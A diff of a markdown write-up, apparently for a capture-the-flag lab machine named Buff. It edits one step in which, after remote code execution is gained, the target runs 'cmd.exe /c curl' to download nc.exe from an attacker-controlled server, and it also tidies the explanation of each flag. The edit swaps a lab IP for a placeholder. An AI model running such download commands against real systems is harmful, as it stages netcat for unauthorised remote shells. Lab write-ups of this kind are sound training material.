0xZuk0/matrix/_posts/2020-08-22-Buff-Writup.md

 2. Now execute the following command after we have RCE.

-`cmd.exe /c curl http://10.10.14.23:8000/nc.exe -o nc.exe`
+`cmd.exe /c curl http://<your tun0 IP address>:8000/nc.exe -o nc.exe`

 ```
-// cmd.exe : we are executing command prompt in the machine
+ cmd.exe : we are executing command prompt in the machine
-// /c      : this options will run the following command in the cmd.exe
+ /c      : this options will run the following command in the cmd.exe
-// curl    : Command line tool to transfer data
+ curl    : Command line tool to transfer data
-// -o      : output filename
+ -o      : output filename
 ```

 We will see that we get a GET request for nc.exe in our server